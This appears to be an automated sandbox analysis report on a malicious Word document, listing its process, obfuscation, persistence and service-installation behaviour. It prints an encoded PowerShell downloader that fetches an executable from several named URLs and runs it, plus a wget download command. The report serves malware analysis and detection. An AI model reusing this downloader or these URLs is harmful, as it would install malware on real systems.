Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k' Jump to behavior
Source: C:\Users\user\546.exeProcess created: C:\Users\user\546.exe --b0e232c2Jump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0cJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\546.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2003\4.2.20\ObjectInspector_demo\Release\ObjectInspectorTest.pdb4 source: 546.exe, 0000000B.00000000.4365989600.0000000000463000.00000002.00020000.sdmp, 546.exe, 0000000C.00000002.4442391514.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000D.00000002.4435633333.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000E.00000002.4732707492.0000000000463000.00000002.00020000.sdmp, 546.exe.6.dr
Source: Binary string: c:\Users\User\Desktop\2003\4.2.20\ObjectInspector_demo\Release\ObjectInspectorTest.pdb source: 546.exe, 0000000B.00000000.4365989600.0000000000463000.00000002.00020000.sdmp, 546.exe, 0000000C.00000002.4442391514.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000D.00000002.4435633333.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000E.00000002.4732707492.0000000000463000.00000002.00020000.sdmp, 546.exe.6.dr

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABDAGIAdwBkAHoAcQB4AGgAeAB6AGEAZwA9ACcAUAB0AGYAdQBpAGoAdABrAHUAJwA7ACQATAB0AHoAZwB6AGQAYgB6AG0AbQBoAHIAbgAgAD0AIAAnADUANAA2ACcAOwAkAEQAYwBmAGcAeABiAHUAZQBmAGUAdwB4AD0AJwBPAG0AYgBnAHkAeABxAHIAeAAnADsAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHQAegBnAHoAZABiAHoAbQBtAGgAcgBuACsAJwAuAGUAeABlACcAOwAkAFcAZgBvAGIAcgBoAGgAaQA9ACcAVQBjAHIAYwB5AGwAaABjAGsAdwBpACcAOwAkAEwAdgBxAGIAbQBvAGgAeQBvAGkAdABzAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMATABJAEUAbgB0ADsAJABDAGoAYwBzAHQAbQB6AGwAbwBxAD0AJwBoAHQAdABwADoALwAvAGgAbwBtAGUALgBtAHUANAB2AGkAZQB0AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGQAZABnADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHQAdQB6AGwAYQBwAGEAcwBsAGEAbgBtAGEAegAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwBqADMAMwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AYQBsAGkAdABpAG8AbgBiAGEAeQAuAGMAbwBtAC8AbgB5AHMAcgBpAC8AaQBpAEkALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGUAYgBrAGgAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADgAbAA4AHkAZAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBpAGcAZABhAHQAYQBwAHIAbwBmAGkAbABlAC4AYwBvAG0ALwBkADgAYgBoAGcALwA3AG0AZgAvACcALgAiAFMAYABQAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQBoAGkAbgBwAHkAYgBtAD0AJwBEAGEAdwBmAGMAbgB4AG8AcABvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAHYAbABnAHIAZgB1AG4AagBhACAAaQBuACAAJABDAGoAYwBzAHQAbQB6AGwAbwBxACkAewB0AHIAeQB7ACQATAB2AHEAYgBtAG8AaAB5AG8AaQB0AHMALgAiAEQATwB3AGAATgBMAE8AYQBEAGAARgBJAEwARQAiACgAJABQAHYAbABnAHIAZgB1AG4AagBhACwAIAAkAFQAYwBwAHIAbwBvAHAAcgB6AGgAZwBzAGIAKQA7ACQASgBrAGUAegBsAGoAbwBtAHcAdQB5AGQAPQAnAEoAdABzAGoAaABiAG8AcQBuAGIAYwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVABjAHAAcgBvAG8AcAByAHoAaABnAHMAYgApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA1ADEAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBBAFQARQAiACgAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiACkAOwAkAEgAcwBrAGkAegB5AHgAagBwAG4AcwA9ACcAUABqAGMAcwBsAGgAZABkAHcAZgBnAHMAJwA7AGIAcgBlAGEAawA7ACQAVwBjAHgAZgBlAHkAegBwAGIAbgB2AHQAPQAnAEsAYwB3AHAAYwB2AGIAZQB6AGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBqAGwAbgBkAHEAdQBmAGEAZwBzAGkAbgA9ACcAWgBoAG8AdwBzAGwAcgB0AHQAaQByAHAAJwA=
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00438EC2 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,11_2_00438EC2
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\546.exeCode function: 11_2_004204FF push ecx; ret 11_2_0042050F
Source: C:\Users\user\546.exeCode function: 12_2_004204FF push ecx; ret 12_2_0042050F
Source: C:\Users\user\546.exeCode function: 12_2_0041F8C0 push eax; ret 12_2_0041F8D4
Source: C:\Users\user\546.exeCode function: 12_2_0041F8C0 push eax; ret 12_2_0041F8FC
Source: C:\Users\user\546.exeCode function: 12_2_0041FBF8 push eax; ret 12_2_0041FC16
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E0E51D push cs; ret 13_2_00E0E55E
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F6E51D push cs; ret 14_2_00F6E55E

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeExecutable created and started: C:\Windows\SysWOW64\driverthunk.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\546.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\546.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\546.exePE file moved: C:\Windows\SysWOW64\driverthunk.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\546.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F8CF58 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,14_2_00F8CF58

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\546.exeFile opened: C:\Windows\SysWOW64\driverthunk.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\546.exeCode function: 11_2_0044617C GetParent,GetParent,IsIconic,GetParent,11_2_0044617C
Source: C:\Users\user\546.exeCode function: 11_2_0040E584 IsIconic,GetWindowPlacement,GetWindowRect,11_2_0040E584
Source: C:\Users\user\546.exeCode function: 11_2_00451505 IsWindowVisible,IsIconic,11_2_00451505
Source: C:\Users\user\546.exeCode function: 12_2_0044617C GetParent,GetParent,IsIconic,GetParent,12_2_0044617C
Source: C:\Users\user\546.exeCode function: 12_2_0040E584 IsIconic,GetWindowPlacement,GetWindowRect,12_2_0040E584
Source: C:\Users\user\546.exeCode function: 12_2_00451505 IsWindowVisible,IsIconic,12_2_00451505
Source: C:\Users\user\546.exeCode function: 12_2_004498FE __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,12_2_004498FE
Source: C:\Users\user\546.exeCode function: 12_2_0040BD80 IsIconic,12_2_0040BD80
Source: C:\Users\user\546.exeCode function: 12_2_0040BE00 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,12_2_0040BE00
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
